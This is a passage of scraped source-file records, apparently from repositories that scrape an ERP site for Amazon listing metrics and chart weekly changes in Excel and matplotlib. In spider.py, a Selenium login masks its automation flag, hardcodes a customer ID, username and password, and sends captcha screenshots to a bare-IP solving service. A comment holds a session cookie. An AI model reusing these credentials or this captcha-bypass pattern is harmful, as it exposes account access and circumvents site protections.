before_item[4]\n all_array.append([asin_name, 0, before_item[1], asin_score, '', 0, before_item[2],\n asin_comment, '', 0, before_item[3], asin_big_ranking, '', 0,\n before_item[4], asin_small_ranking])\n\n last_week_date = last_week.split(\"/\")[1]\n create_file(now_week+\"A\"+last_week_date)\n\n wb = xlwt.Workbook(encoding='utf8')\n # 创建一个sheet对象\n sheet = wb.add_sheet('order-sheet')\n\n # 设置文件头的样式,这个不是必须的可以根据自己的需求进行更改\n style_heading = xlwt.easyxf(\"\"\"\n font:\n name Arial,\n colour_index white,\n bold on,\n height 0xA0;\n align:\n wrap off,\n vert center,\n horiz center;\n pattern:\n pattern solid,\n fore-colour 0x19;\n borders:\n left THIN,\n right THIN,\n top THIN,\n bottom THIN; \n \"\"\")\n\n # 不变样式 金色\n style_not_change = xlwt.easyxf(\"\"\"pattern: pattern solid, fore_colour 43\"\"\") # 43\n # 深红\n style_deep_rise = xlwt.easyxf(\"\"\"pattern: pattern solid, fore_colour 3\"\"\") # 6\n # 深绿\n style_deep_drop = xlwt.easyxf(\"\"\"pattern: pattern solid, fore_colour 6\"\"\") # 3\n # 微红\n style_litter_rise = xlwt.easyxf(\"\"\"pattern: pattern solid, fore_colour 42\"\"\") # 45\n # 微绿\n style_litter_drop = xlwt.easyxf(\"\"\"pattern: pattern solid, fore_colour 45\"\"\") # 42\n\n # 写入文件标题\n sheet.write(0, 0, 'ASIN', style_heading)\n sheet.write(0, 1, '标题', style_heading)\n sheet.write(0, 2, \"价格\", style_heading) # 价格\n # sheet.write(0, 3, \"这周价格\", style_heading) # 价格\n # sheet.write(0, 4, \"上周价格\", style_heading) # 价格\n # sheet.write(0, 5, \"\", style_heading) # 价格\n sheet.write(0, 3, '这周评分', style_heading)\n sheet.write(0, 4, '上周评分', style_heading)\n sheet.write(0, 5, '趋势', style_heading)\n sheet.write(0, 6, '', style_heading)\n sheet.write(0, 7, '这周评论数', style_heading)\n sheet.write(0, 8, '上周评论数', style_heading)\n sheet.write(0, 9, '趋势', style_heading)\n sheet.write(0, 10, '', style_heading)\n sheet.write(0, 11, '这周大类排名', style_heading)\n sheet.write(0, 12, '上周大类排名', style_heading)\n sheet.write(0, 13, '趋势', style_heading)\n sheet.write(0, 14, '', style_heading)\n sheet.write(0, 15, '这周小类排名', style_heading)\n 
sheet.write(0, 16, '上周小类排名', style_heading)\n sheet.write(0, 17, '趋势', style_heading)\n\n # 写入数据\n data_row = 1\n for i in all_array:\n title, price = get_sku(i[0], cookies)\n sheet.write(data_row, 0, i[0])\n sheet.write(data_row, 1, title)\n sheet.write(data_row, 2, price) # 价格\n sheet.write(data_row, 3, i[1])\n sheet.write(data_row, 4, i[2])\n if i[3] > 0:\n if i[3] >= change_range[0][1]:\n sheet.write(data_row, 5, i[3], style_deep_rise)\n else:\n sheet.write(data_row, 5, i[3], style_litter_rise)\n elif i[3] < 0:\n if abs(i[3]) < change_range[0][1]:\n sheet.write(data_row, 5, i[3], style_litter_drop)\n else:\n sheet.write(data_row, 5, i[3], style_deep_drop)\n else:\n sheet.write(data_row, 5, i[3], style_not_change)\n sheet.write(data_row, 6, i[4])\n sheet.write(data_row, 7, i[5])\n sheet.write(data_row, 8, i[6])\n if i[7] > 0:\n if i[7] >= change_range[1][0]:\n sheet.write(data_row, 9, i[7], style_deep_rise)\n else:\n sheet.write(data_row, 9, i[7], style_litter_rise)\n elif i[7] < 0:\n if abs(i[7]) < change_range[1][1]:\n sheet.write(data_row, 9, i[7], style_litter_drop)\n else:\n sheet.write(data_row, 9, i[7], style_deep_drop)\n else:\n sheet.write(data_row, 9, i[7], style_not_change)\n sheet.write(data_row, 10, i[8])\n sheet.write(data_row, 11, i[9])\n sheet.write(data_row, 12, i[10])\n if i[11] > 0:\n if i[11] >= change_range[2][1]:\n sheet.write(data_row, 13, -i[11], style_deep_drop)\n else:\n sheet.write(data_row, 13, -i[11], style_litter_drop)\n elif i[11] < 0:\n if abs(i[11]) < change_range[2][0]:\n sheet.write(data_row, 13, abs(i[11]), style_litter_rise)\n else:\n sheet.write(data_row, 13, abs(i[11]), style_deep_rise)\n else:\n sheet.write(data_row, 13, i[11], style_not_change)\n sheet.write(data_row, 14, i[12])\n sheet.write(data_row, 15, i[13])\n sheet.write(data_row, 16, i[14])\n if i[15] > 0:\n if i[15] >= change_range[3][1]:\n sheet.write(data_row, 17, -i[15], style_deep_drop)\n else:\n sheet.write(data_row, 17, -i[15], style_litter_drop)\n elif i[15] < 0:\n if abs(i[15]) < change_range[3][0]:\n sheet.write(data_row, 17, abs(i[15]), style_litter_rise)\n else:\n sheet.write(data_row, 17, abs(i[15]), style_deep_rise)\n else:\n sheet.write(data_row, 17, i[15], style_not_change)\n data_row = data_row + 1\n\n shop_name = name.split(\".\")[0]\n wb.save(now_week+\"A\"+last_week_date+\"/\"+shop_name+\".xls\")\n\n\ndef create_file(file: str):\n \"\"\"\n 创建文件夹\n file: 文件夹\n \"\"\"\n if not os.path.isdir(file):\n os.makedirs(file)\n\n\ndef random_color():\n \"\"\"\n 颜色函数\n \"\"\"\n color_arr = ['1', '2', '3', '4', '5', '6', '7', '8', '9', 'A', 'B', 'C', 'D', 'E', 'F']\n color = \"\"\n for i in range(6):\n color += color_arr[random.randint(0, 14)]\n return \"#\"+color\n\n\ndef get_sku(asin: str, cookies: str):\n headers = {\n \"Cookie\": cookies\n }\n url = \"http://gg7.irobotbox.com/IrobotBox/Amazon/AmazonListingList.aspx?&SearchType=0&txtNo2=3&txtNo=\"+asin\n html = requests.get(url=url, headers=headers).text\n soup = BeautifulSoup(html, 'lxml')\n try:\n soup_text = soup.select_one('tr[skuinfo*=\"skuinfo\"] td:nth-child(3) p:nth-child(2)')\n price = soup.select_one('input[id*=\"txtPrice\"]').attrs['value']\n title = soup_text.get_text()\n except:\n title = \"\"\n price = \"\"\n return title, price\n\n\nname_list = ['DJ(FR).xlsx', 'DJ(德国).xlsx', 'DJ(英国).xlsx', 'DreamJ(加拿大).xlsx', 'DreamJ(美国).xlsx',\n 'FOR(日本).xlsx', 'Formemory(加拿大).xlsx', 'Formemory(美国).xlsx', 'HAPYSHOP(日本).xlsx',\n 'HOM(日本).xlsx', 'Housestory(加拿大).xlsx', 'Housestory(美国).xlsx', 'houstory(德国).xlsx',\n 
'houstory(意大利).xlsx', 'houstory(英国).xlsx', 'houstory(西班牙).xlsx', 'Kicpot(加拿大).xlsx',\n 'Kicpot(美国).xlsx', 'SHENGO(日本).xlsx', 'Tumao(日本).xlsx']\n\n\nimport time\nfor i in name_list:\n start = time.time()\n compare_data([\"week/2019-12-20\", \"week/2019-12-23\"], i)\n end = time.time()\n result = end-start\n print(i, \" 所花时间\", result)"
},
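Editorial note: compare_xlsx.py above computes week-over-week deltas per ASIN with two nested loops over numpy rows, treating missing ASINs as zero on either side. The same join can be expressed with a pandas outer merge; this is an alternative sketch, not the author's code, and it assumes the five columns written by save_xlsx.py:

```python
# Alternative sketch: week-over-week delta via an outer merge keyed on ASIN.
# Column names follow the sheets produced by save_xlsx.py; rows present in
# only one week are filled with 0, matching the loop logic in the record above.
import pandas as pd

def weekly_delta(last: pd.DataFrame, now: pd.DataFrame) -> pd.DataFrame:
    merged = now.merge(last, on='ASIN', how='outer',
                       suffixes=('_now', '_last')).fillna(0)
    for col in ('评分', '评论数', '大类排名', '小类排名'):
        merged[col + '_diff'] = merged[col + '_now'] - merged[col + '_last']
    return merged
```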
{
"alpha_fraction": 0.5872857570648193,
"alphanum_fraction": 0.6177400350570679,
"avg_line_length": 34.65243911743164,
"blob_id": "50e5666683ad3d646298703fc10d8d8c37aa3e24",
"content_id": "e2019a16c44cab1a552796680aa4335d5e0b07fb",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 6063,
"license_type": "no_license",
"max_line_length": 126,
"num_lines": 164,
"path": "/tumao_data_display/spider.py",
"repo_name": "zhengquantao/DataDisplay",
"src_encoding": "UTF-8",
"text": "import json\r\nimport time\r\n\r\nimport requests\r\nfrom PIL import Image\r\nfrom bs4 import BeautifulSoup\r\nfrom selenium import webdriver\r\nfrom selenium.common.exceptions import UnexpectedAlertPresentException\r\nfrom selenium.webdriver.support.wait import WebDriverWait\r\nfrom selenium.webdriver import DesiredCapabilities\r\nfrom selenium.webdriver.support import expected_conditions as EC\r\nfrom selenium.webdriver.common.by import By\r\n\r\n\r\ndef login():\r\n options = webdriver.ChromeOptions()\r\n options.add_argument('--disable-gpu')\r\n options.add_argument(\"disable-web-security\")\r\n options.add_argument('disable-infobars')\r\n options.add_experimental_option('excludeSwitches', ['enable-automation'])\r\n capa = DesiredCapabilities.CHROME\r\n capa[\"pageLoadStrategy\"] = \"none\"\r\n driver = webdriver.Chrome(chrome_options=options, desired_capabilities=capa)\r\n wait = WebDriverWait(driver, 30)\r\n driver.maximize_window()\r\n\r\n login_url = \"http://gg7.irobotbox.com/Manager/Login.aspx\"\r\n driver.get(login_url)\r\n\r\n while True:\r\n # 商家号\r\n wait.until(EC.presence_of_element_located((By.CSS_SELECTOR, \"#TextCustomerID\")))\r\n TextCustomerID = driver.find_element_by_css_selector(\"#TextCustomerID\")\r\n TextCustomerID.send_keys(\"1921\")\r\n\r\n # 用户名\r\n wait.until(EC.presence_of_element_located((By.CSS_SELECTOR, \"#TextAdminName\")))\r\n TextAdminName = driver.find_element_by_css_selector(\"#TextAdminName\")\r\n TextAdminName.send_keys(\"text\")\r\n\r\n # 密码\r\n wait.until(EC.presence_of_element_located((By.CSS_SELECTOR, \"#TextPassword\")))\r\n TextPassword = driver.find_element_by_css_selector(\"#TextPassword\")\r\n TextPassword.send_keys(\"tm201606\")\r\n\r\n # 识别验证码\r\n wait.until(EC.presence_of_element_located((By.CSS_SELECTOR, \"#captchaImage\")))\r\n captchaImage = driver.find_element_by_css_selector(\"#captchaImage\")\r\n location = captchaImage.location\r\n size = captchaImage.size\r\n left = location['x']\r\n top = location['y']\r\n right = location['x'] + size['width']\r\n bottom = location['y'] + size['height']\r\n driver.get_screenshot_as_file('a.png')\r\n\r\n a = Image.open(\"a.png\")\r\n a = a.convert('L')\r\n im = a.crop((left, top, right, bottom))\r\n\r\n im.save('a.png')\r\n f = open('a.png', 'rb')\r\n response = requests.post(url=\"http://182.61.174.27:7788/\", data=f.read())\r\n text = json.loads(response.text)\r\n\r\n # 输入验证码\r\n txtValidate = driver.find_element_by_css_selector(\"#txtValidate\")\r\n txtValidate.send_keys(text['code'])\r\n\r\n # 登录按钮\r\n wait.until(EC.presence_of_element_located((By.CSS_SELECTOR, \"#submit\")))\r\n submit = driver.find_element_by_css_selector(\"#submit\")\r\n submit.click()\r\n time.sleep(2)\r\n\r\n try:\r\n if driver.current_url != login_url:\r\n cookies = driver.get_cookies()\r\n cookie = [item[\"name\"] + \"=\" + item[\"value\"] for item in cookies]\r\n cookie_str = '; '.join(item for item in cookie)\r\n return cookie_str\r\n driver.quit()\r\n\r\n except UnexpectedAlertPresentException as e:\r\n print(\"验证码错误\")\r\n time.sleep(2)\r\n driver.refresh()\r\n\r\n\r\ndef get_sku(asin: str, cookies: str):\r\n headers = {\r\n \"Cookie\": cookies\r\n }\r\n url = \"http://gg7.irobotbox.com/IrobotBox/Amazon/AmazonListingList.aspx?&SearchType=0&txtNo2=3&txtNo=\"+asin\r\n html = requests.get(url=url, headers=headers).text\r\n soup = BeautifulSoup(html, 'lxml')\r\n try:\r\n soup_text = soup.select_one('tr[skuinfo*=\"skuinfo\"] td:nth-child(3) p:nth-child(2)')\r\n soup_price = 
soup.select_one('input[id*=\"txtPrice\"]').attrs['value']\r\n print(soup_text.get_text(), '----', soup_price)\r\n except:\r\n soup_text = \"\"\r\n soup_price = \"\"\r\n return soup_text, soup_price\r\n\r\ncookies = login()\r\nget_sku(\"B07M5XKQ71\", cookies)\r\n\r\n#\r\n# code_url = \"http://gg7.irobotbox.com/Manager/Tools/ValidateCode.ashx\"\r\n#\r\n# login_url = \"http://gg7.irobotbox.com/Manager/Login.aspx\"\r\n#\r\n# index_url = \"http://gg7.irobotbox.com/Manager/index.aspx\"\r\n#\r\n# find_item = \"http://gg7.irobotbox.com/IrobotBox/Amazon/AmazonListingList.aspx?&SearchType=0&txtNo2=3&txtNo=\"\r\n# import requests\r\n# import json\r\n#\r\n# header = {\r\n# \"Accept\": \"*/*\",\r\n# \"Accept-Encoding\": \"gzip, deflate\",\r\n# \"Accept-Language\": \"zh-CN,zh;q=0.9\",\r\n# \"Cache-Control\": \"no-cache\",\r\n# \"Connection\": \"keep-alive\",\r\n# \"Content-Length\": \"40\",\r\n# \"Content-Type\": \"application/x-www-form-urlencoded; charset=UTF-8\",\r\n# \"Host\": \"gg7.irobotbox.com\",\r\n# \"Pragma\": \"no-cache\",\r\n# \"Upgrade-Insecure-Requests\": \"1\",\r\n# \"Cookie\": \"_ati=1353840465818; Hm_lvt_bd5c92691c7aa293cbae57b8424ee1e8=1576805861,1577174104; \\\r\n# irobotbox_cookie_language=zh_CN; ASP.NET_SessionId=dtzj1u0h0wp3ckpwtl4xcana; irobotbox_cookie_time=\\\r\n# 2019-12-26+17%3a03%3a17; ValidCode=2HsNAisFZqw%3d\",\r\n# \"User-Agent\": \"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36\"\r\n# }\r\n# session = requests.session()\r\n# login = session.get(login_url, headers=header)\r\n#\r\n# image = session.get(code_url)\r\n# print(login.history)\r\n# response = requests.post(url=\"http://182.61.174.27:7788/\", data=image.content)\r\n#\r\n# code = json.loads(response.text)\r\n# user_msg = {\r\n# \"actions\": \"SendCaptchaCode\", # UserLogin\r\n# \"userLoginView\": {\r\n# \"CustomerId\": \"1921\",\r\n# \"UserName\": \"text\",\r\n# \"Password\": \"tm201606\",\r\n# \"CaptchaCode\": code['code'],\r\n# \"LocalIp\": \"192.168.200.128\",\r\n# \"RedirectUrl\": \"Index.aspx\",\r\n# \"IsNewDeviceLogin\": False,\r\n# }\r\n# }\r\n#\r\n# r = session.post(login_url, data=user_msg)\r\n# print(r.text)\r\n# if r:\r\n# # m = session.get(index_url)\r\n# # print(m.text, m.cookies)\r\n# s = session.get(find_item+\"B07CG9BJ9H\")\r\n# print(s.text)\r\n# print(r)"
},
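Editorial note: the captcha step in spider.py screenshots the whole page and crops the element out by its location and size. The crop-box arithmetic in isolation, using Pillow only; the coordinates here are placeholders for what the scraper reads from `element.location` and `element.size`:

```python
# Crop an element out of a full-page screenshot. The (x, y, w, h) values
# are placeholders; in the scraper they come from element.location/.size.
from PIL import Image

def crop_element(screenshot_path: str, x: int, y: int, w: int, h: int) -> Image.Image:
    img = Image.open(screenshot_path).convert('L')  # grayscale, as the scraper does before OCR
    return img.crop((x, y, x + w, y + h))           # box is (left, top, right, bottom)
```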
{
"alpha_fraction": 0.5222499370574951,
"alphanum_fraction": 0.5428978204727173,
"avg_line_length": 35.25161361694336,
"blob_id": "2674d7fed5d584ec1e028bf54cbef5a978d5d101",
"content_id": "1b7dae5521e159780c90004980171b7a891edf3b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5874,
"license_type": "no_license",
"max_line_length": 105,
"num_lines": 155,
"path": "/images.py",
"repo_name": "zhengquantao/DataDisplay",
"src_encoding": "UTF-8",
"text": "import os\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom matplotlib.font_manager import FontProperties\nimport random\n\n\nfont = FontProperties(fname=\"/home/zhengquantao/python/DataDisplay/font/FangSong.ttf\")\n\nappear_day = 3\n\n\ndef find_file(file: str, name: str):\n mul_file_name = os.walk(file)\n frame = list() # 所有dataframe数组\n datetime_list = list()\n for filename in mul_file_name:\n if filename[2]:\n # datetime.append(filename[0][5:])\n for document_name in filename[2]:\n if name == document_name:\n data = pd.read_excel(filename[0]+\"/\"+document_name)\n data[\"date\"] = filename[0][5:] # 加入时间\n frame.append(data)\n datetime_list.append(filename[0][5:])\n break\n result = pd.concat(frame)\n sort_result = result.sort_values(by=['ASIN', 'date'])\n group_data = sort_result.groupby(['ASIN']) # .apply(lambda x: x.sort_values(\"date\", ascending=True))\n\n group_count = group_data['ASIN'].size().to_dict() # 转化成字典\n group_rank = sorted(group_count, key=lambda x: group_count[x], reverse=True) # 字典排序\n\n names = name.split(\".\")[0]\n\n # ===============评分===========\n fig = plt.figure(figsize=(14, 7))\n ax1 = fig.subplots(nrows=1)\n # plt.rcParams['font.sans-serif'] = ['SimHei']\n for rank in group_rank:\n for good in group_data:\n if rank == good[0] and len(good[1]) > appear_day:\n create_file(\"image/\"+names)\n shop_score = good[1]['评分'].fillna(0)\n datetime = good[1]['date'].fillna('0')\n ax1.plot(datetime, shop_score, random_color(), label=good[0])\n ax1.legend(title=u\"GOODS\", loc='right', bbox_to_anchor=(-0.015, 0.6))\n ax1.grid(True)\n plt.xlabel(name, fontproperties=font)\n plt.xticks(rotation=45)\n plt.title(names+\" 评分\", fontproperties=font)\n plt.savefig('./image/'+names+'/'+'评分.png')\n # plt.cla()\n # plt.close()\n # plt.show()\n\n # ================评论==========\n fig = plt.figure(figsize=(14.5, 7))\n ax1 = fig.subplots(nrows=1)\n # plt.rcParams['font.sans-serif'] = ['SimHei']\n create_file(\"image/\" + names)\n for rank in group_rank:\n for good in group_data:\n if rank == good[0] and len(good[1]) > appear_day:\n shop_comment = good[1]['评论数'].fillna(0)\n datetime = good[1]['date'].fillna('0')\n ax1.plot(datetime, shop_comment, random_color(), label=good[0])\n ax1.legend(title=u\"GOODS\", loc='right', bbox_to_anchor=(-0.04, 0.6))\n ax1.grid(True)\n plt.xlabel(name, fontproperties=font)\n plt.xticks(rotation=45)\n plt.title(names+\" 评论数\", fontproperties=font)\n plt.savefig('./image/'+names+'/'+'评论数.png')\n # plt.cla()\n # plt.close()\n # plt.show()\n\n # ================大类排名=================\n fig = plt.figure(figsize=(14.5, 7))\n ax1 = fig.subplots(nrows=1)\n # plt.rcParams['font.sans-serif'] = ['SimHei']\n create_file(\"image/\" + names)\n for rank in group_rank:\n for good in group_data:\n if rank == good[0] and len(good[1]) > appear_day:\n shop_big_ranking = good[1]['大类排名'].fillna(0)\n datetime = good[1]['date'].fillna('0')\n ax1.plot(datetime, -shop_big_ranking, random_color(), label=good[0])\n ax1.legend(title=u\"GOODS\", loc='right', bbox_to_anchor=(-0.03, 0.6))\n ax1.grid(True)\n plt.xlabel(name, fontproperties=font)\n plt.xticks(rotation=45)\n plt.title(names+\" 大类排名\", fontproperties=font)\n plt.savefig('./image/'+names+'/'+'大类排名.png')\n # plt.cla()\n # plt.close()\n # plt.show()\n\n # ================小类排名=================\n fig = plt.figure(figsize=(14.5, 7))\n ax1 = fig.subplots(nrows=1)\n # plt.rcParams['font.sans-serif'] = ['SimHei']\n create_file(\"image/\" + names)\n for rank in group_rank:\n for good in group_data:\n if rank == 
good[0] and len(good[1]) > appear_day:\n shop_small_ranking = good[1]['小类排名'].fillna(0)\n datetime = good[1]['date'].fillna('0')\n ax1.plot(datetime, -shop_small_ranking, random_color(), label=good[0])\n ax1.legend(title=u\"GOODS\", loc='right', bbox_to_anchor=(-0.04, 0.6))\n ax1.grid(True)\n plt.xlabel(name, fontproperties=font)\n plt.xticks(rotation=45)\n plt.title(names+\" 小类排名\", fontproperties=font)\n plt.savefig('./image/'+names+'/'+'小类排名.png')\n # plt.cla()\n # plt.close()\n # plt.show()\n\n\ndef create_file(file: str):\n \"\"\"\n 创建文件夹\n file: 文件夹\n \"\"\"\n if not os.path.isdir(file):\n os.makedirs(file)\n\n\ndef random_color():\n \"\"\"\n 颜色函数\n \"\"\"\n color_arr = ['1', '2', '3', '4', '5', '6', '7', '8', '9', 'A', 'B', 'C', 'D', 'E', 'F']\n color = \"\"\n for i in range(6):\n color += color_arr[random.randint(0, 14)]\n return \"#\"+color\n\n\n# find_file(\"shop\")\n\nname_list = ['DJ(FR).xlsx', 'DJ(德国).xlsx', 'DJ(英国).xlsx', 'DreamJ(加拿大).xlsx', 'DreamJ(美国).xlsx',\n 'FOR(日本).xlsx', 'Formemory(加拿大).xlsx', 'Formemory(美国).xlsx', 'HAPYSHOP(日本).xlsx',\n 'HOM(日本).xlsx', 'Housestory(加拿大).xlsx', 'Housestory(美国).xlsx', 'houstory(德国).xlsx',\n 'houstory(意大利).xlsx', 'houstory(英国).xlsx', 'houstory(西班牙).xlsx', 'Kicpot(加拿大).xlsx',\n 'Kicpot(美国).xlsx', 'SHENGO(日本).xlsx', 'Tumao(日本).xlsx']\n\nimport time\nfor i in name_list:\n start = time.time()\n find_file(\"shop\", i)\n end = time.time()\n result = end-start\n print(i, \" 所花时间\", result)"
},
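Editorial note: `random_color()` above builds a hex string character by character (and, as written, can never emit the digit 0, and may repeat colors across series). A shorter equivalent plus a deterministic variant that always gives the same ASIN the same color across plots; this is a sketch, not the repo's code:

```python
import random
import hashlib

def random_color() -> str:
    # One random 24-bit value formatted as #RRGGBB
    return '#%06X' % random.randint(0, 0xFFFFFF)

def stable_color(name: str) -> str:
    # Same input -> same color, so a series keeps its color between runs
    return '#' + hashlib.md5(name.encode('utf-8')).hexdigest()[:6]
```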
{
"alpha_fraction": 0.5469574332237244,
"alphanum_fraction": 0.5603235960006714,
"avg_line_length": 34.11111068725586,
"blob_id": "1c9295868ba9efde8042ff14bc91bb9f53a109ed",
"content_id": "b8aba1ecae5c433ad0f5495c6a7a8196e594d58d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3049,
"license_type": "no_license",
"max_line_length": 105,
"num_lines": 81,
"path": "/tumao_data_display/save_xlsx.py",
"repo_name": "zhengquantao/DataDisplay",
"src_encoding": "UTF-8",
"text": "import os\nimport pandas as pd\nimport random\nimport numpy as np\nimport datetime\n\n\ndef find_file(file: str, name: str):\n mul_file_name = os.walk(file)\n frame = list() # 所有dataframe数组\n # datetime_list = list()\n for filename in mul_file_name:\n if filename[2]:\n # datetime.append(filename[0][5:])\n for document_name in filename[2]:\n if name == document_name:\n data = pd.read_excel(filename[0]+\"/\"+document_name)\n # data[\"date\"] = filename[0][5:] # 加入时间\n frame.append(data)\n # datetime_list.append(filename[0][5:])\n break\n result = pd.concat(frame)\n sort_result = result.sort_values(by=['ASIN'])\n group_data = sort_result.groupby(['ASIN']) # .apply(lambda x: x.sort_values(\"date\", ascending=True))\n\n group_count = group_data['ASIN'].size().to_dict() # 转化成字典\n # group_rank = sorted(group_count, key=lambda x: group_count[x], reverse=True) # 字典排序\n\n # names = name.split(\".\")[0]\n today = str(datetime.date.today())\n create_file(\"week/\"+today)\n\n shop_array = list()\n\n for good in group_data:\n asin_id = good[0]\n asin_count = len(good[1])\n asin_score = round(sum(good[1]['评分'].fillna(0)) / asin_count, 2)\n asin_comment = round(sum(good[1]['评论数'].fillna(0)) / asin_count, 2)\n asin_small_ranking = round(sum(good[1]['小类排名'].fillna(0))/asin_count, 2)\n asin_big_ranking = round(sum(good[1]['大类排名'].fillna(0))/asin_count, 2)\n shop_array.append([asin_id, asin_score, asin_comment, asin_big_ranking, asin_small_ranking])\n data_obj = pd.DataFrame(shop_array, columns=['ASIN', '评分', '评论数', '大类排名', '小类排名'])\n writer = pd.ExcelWriter(\"week/\"+today+\"/\"+name)\n data_obj.to_excel(writer, \"Sheet\", index=False)\n writer.save()\n\n\ndef create_file(file: str):\n \"\"\"\n 创建文件夹\n file: 文件夹\n \"\"\"\n if not os.path.isdir(file):\n os.makedirs(file)\n\n\ndef random_color():\n \"\"\"\n 颜色函数\n \"\"\"\n color_arr = ['1', '2', '3', '4', '5', '6', '7', '8', '9', 'A', 'B', 'C', 'D', 'E', 'F']\n color = \"\"\n for i in range(6):\n color += color_arr[random.randint(0, 14)]\n return \"#\"+color\n\n\nname_list = ['DJ(FR).xlsx', 'DJ(德国).xlsx', 'DJ(英国).xlsx', 'DreamJ(加拿大).xlsx', 'DreamJ(美国).xlsx',\n 'FOR(日本).xlsx', 'Formemory(加拿大).xlsx', 'Formemory(美国).xlsx', 'HAPYSHOP(日本).xlsx',\n 'HOM(日本).xlsx', 'Housestory(加拿大).xlsx', 'Housestory(美国).xlsx', 'houstory(德国).xlsx',\n 'houstory(意大利).xlsx', 'houstory(英国).xlsx', 'houstory(西班牙).xlsx', 'Kicpot(加拿大).xlsx',\n 'Kicpot(美国).xlsx', 'SHENGO(日本).xlsx', 'Tumao(日本).xlsx']\n\nimport time\nfor i in name_list:\n start = time.time()\n find_file(\"shop/2\", i)\n end = time.time()\n result = end-start\n print(i, \" 所花时间\", result)"
},
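Editorial note: save_xlsx.py above averages each metric per ASIN with an explicit loop over groups; `groupby().mean()` expresses the same aggregation in one step. A hedged sketch assuming the same column headers; note one behavioral difference called out in the comment:

```python
# Equivalent aggregation sketch: per-ASIN means rounded to 2 decimals.
# Caveat: groupby().mean() skips NaNs, whereas the loop above fills them
# with 0 before summing, so results differ when cells are missing.
import pandas as pd

def weekly_means(result: pd.DataFrame) -> pd.DataFrame:
    cols = ['评分', '评论数', '大类排名', '小类排名']
    means = result.groupby('ASIN')[cols].mean().round(2)
    return means.reset_index()
```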
{
"alpha_fraction": 0.5478723645210266,
"alphanum_fraction": 0.5797872543334961,
"avg_line_length": 14.75,
"blob_id": "ba6876d8dffb687f7823b544c9aa134badc2aa4b",
"content_id": "fcebfb9db7c5d8ea0178990ea08e339da9832262",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 188,
"license_type": "no_license",
"max_line_length": 44,
"num_lines": 12,
"path": "/test3.py",
"repo_name": "zhengquantao/DataDisplay",
"src_encoding": "UTF-8",
"text": "from functools import reduce\nimport datetime\nprint(datetime.date.today())\n\na = {'a': 1, 'b': 2, 'n': 0, 'c': 3, 'f': 5}\n\n\ndef mul(x):\n return a[x] < 3\n\nm = filter(mul, a)\nprint(list(m))"
},
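Editorial note: the filter in test3.py iterates over the dict's keys through a named predicate; a comprehension states the same intent directly:

```python
a = {'a': 1, 'b': 2, 'n': 0, 'c': 3, 'f': 5}
# Keys whose value is below 3, without a separate predicate function
small = [k for k, v in a.items() if v < 3]
print(small)
```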
{
"alpha_fraction": 0.544477641582489,
"alphanum_fraction": 0.5665671825408936,
"avg_line_length": 25.55555534362793,
"blob_id": "b5c1f54cbc65c9dc7b2d66975f04feab87b57c08",
"content_id": "0b54b07a9104aba2499c4666df85b0edf3dee935",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1741,
"license_type": "no_license",
"max_line_length": 95,
"num_lines": 63,
"path": "/show.py",
"repo_name": "zhengquantao/DataDisplay",
"src_encoding": "UTF-8",
"text": "import numpy as np\nimport matplotlib.pyplot as plt\n# from matplotlib.widgets import MultiCursor\nimport matplotlib.dates as mdate\nimport pandas as pd\n\n\nclass ShowData(object):\n\n def __init__(self):\n self.path = None\n pass\n\n def open(self, path):\n get_data = pd.read_excel(path)\n return get_data\n\n def plot(self, path):\n data = self.open(path)\n shop_name = data['ASIN']\n shop_score = data['评分'].fillna('0')\n shop_comment = data['评论数'].fillna('0')\n shop_big_ranking = data['大类排名'].fillna('0')\n shop_small_ranking = data['小类排名'].fillna('0')\n\n fig = plt.figure(figsize=(10, 6))\n (ax1, ax2, ax3, ax4) = fig.subplots(nrows=4)\n plt.rcParams['font.sans-serif'] = ['SimHei']\n\n ax1.plot(shop_score.index, shop_score, \"red\", label=\"评分\")\n ax1.legend(title=\"评分\")\n ax1.grid(True)\n\n ax2.plot(shop_comment.index, shop_comment, \"red\", label=\"评论数\")\n ax2.legend(title=\"评论数\")\n ax2.grid(True)\n\n ax3.plot(shop_big_ranking.index, shop_big_ranking, \"red\", label=\"大类\")\n ax3.grid(True)\n ax3.legend(title=\"大类\")\n\n ax4.plot(shop_small_ranking.index, shop_small_ranking, \"red\", label=\"小类\")\n ax4.grid(True)\n ax4.legend(title=\"小类\")\n\n # multi = MultiCursor(fig.canvas, (ax1, ax2, ax3, ax4), color='r', lw=1, linestyle=':',\n # horizOn=False, vertOn=True)\n\n plt.xlabel(\"店名\")\n plt.savefig('/')\n plt.show()\n\n\ns = ShowData()\ns.plot(\"./shop/2019-12-05/DJ(FR).xlsx\")\n\n\nclass ReadFile(object):\n def __init__(self):\n pass\n\n def __new__(cls, *args, **kwargs):\n pass\n\n\n"
}
] | 7 |
juanmafx/m15 | https://github.com/juanmafx/m15 | da8b3e2fe85514de01e66d8c3b987cfadef05ec4 | 14126480c24fa987e859231c2ae3492f2b5b0835 | d02ef9247d2da04ed73958f3d6ba6198cb4ee37c | refs/heads/master | 2020-03-11T00:42:34.587616 | 2018-04-26T21:24:21 | 2018-04-26T21:24:21 | 129,670,177 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.5563910007476807,
"alphanum_fraction": 0.5964912176132202,
"avg_line_length": 27.428571701049805,
"blob_id": "c566c06351377c909bec8919bfd605a20d971197",
"content_id": "6ab599e9d1c2a1b760c80e94e16993abe3240174",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 399,
"license_type": "no_license",
"max_line_length": 69,
"num_lines": 14,
"path": "/m15.py",
"repo_name": "juanmafx/m15",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Apr 15 22:57:47 2018\n\n@author: J\n\"\"\"\nimport csv\nwith open('Bitcoin15.csv', 'wb') as csvfile:\n spamwriter = csv.writer(csvfile, delimiter=' ',\n quotechar='|', quoting=csv.QUOTE_MINIMAL)\n spamwriter.writerow(['Spam'] * 5 + ['Baked Beans'])\n spamwriter.writerow(['Spam', 'Lovely Spam', 'Wonderful Spam'])\n\nprint (\"Corio\")\n\n"
}
] | 1 |
